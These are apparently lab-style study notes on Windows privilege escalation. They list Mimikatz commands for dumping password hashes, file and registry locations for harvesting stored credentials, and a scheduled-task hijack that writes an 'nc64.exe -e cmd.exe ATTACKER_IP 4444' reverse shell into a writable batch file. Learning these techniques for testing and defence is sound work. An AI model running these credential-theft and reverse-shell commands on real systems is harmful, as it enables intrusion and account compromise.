🪟Windows Escalation

Windows Privilege Escalation

Like with Linux there are many ways to leverage our privileges on Windows

• Misconfigurations on services or schedlued tasks

• Excessive privilegeson user account

• Vulnerable software

• Missing security patches

Windows Users

• Administators - Most privileges, can change any system config and access any file

• Standard Users - Access some files and perfrom limited tasks.

• SYSTEM/ LocalSystem - Used by OS to perform internal tasks, has full access to all file and can run with privileges higher than Administrators.

• Local Service - Default account, uses anonymous creds to authenticate

• Network Service - Default account, uses computer cres to authenticate

Harvesting Passwords

Mimikatz

The go to tool for Window post exploitation

• privilege::debug Obtains debug privileges which allows access to other processes for debugging.

• token::elevate Escalate privileges to maximum

• lsadump::sam Shows list of all password hashes on machine

Unattended Windows Installations

• When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, this allow for a single OS to be installed on serverhost s in teh network. These kinds of installations are referred to as unattended installations as they don't require user interaction and use the admin account. they are stored in the following locations:

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

  As part of these files, you might encounter credentials:

  <Credentials>
      <Username>Administrator</Username>
      <Domain>thm.local</Domain>
      <Password>MyPassword123</Password>
  </Credentials>

  Powershell History

• Memory of previously run commands.

• Useful for repeating commands

• If user runs a command that includes a password it can be recovered using:

  type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

• Powershell won't recognize %userprofile% as an environment variable. To read the file from Powershell, you'd have to replace %userprofile% with $Env:userprofile.

  Saved Windows Credentials

• The command below will list saved credentials:

  cmdkey /list

• While you can't see the actual passwords, you can use them with the runas command and the /savecred option, as seen below.

  runas /savecred /user:admin cmd.exe

  IIS Configuration

• Internet Information Services is the default web server on Windows installations.

• The configuration is stored in web.config and can store passwords for databases or configured authentication mechanisms.

  • C:\inetpub\wwwroot\web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

• Here is a quick way to find database connection strings on the file:

  type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

  Retrieve Credentials from Software: PuTTY

• SSH clients are commonly found on Windows systems.

• You can retrieve stored credentials with this command:

  reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks ⤴️⛔️

• Can be listed using schtasks command

• Detailed information can be found using schtasks /query /tn vulntask /fo list /v

• You want to find "Task To Run" and "Run As User"

• If our user can modify the "Task To Run" executable then qw cantrol what is executed.

• We can check for file permissions using: icacls c:\tasks\schtack.bat

• c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)

                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Users:(I)(F)

• In this case we can see BUILTIN\Users has full access (F)

• We can modify the .bat file

• C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

• Then start a lisetner on our mchine nc -lvp 4444

• And then we wait for the task to run

Automated Enumeration ⤴️⛔

• WinPEAS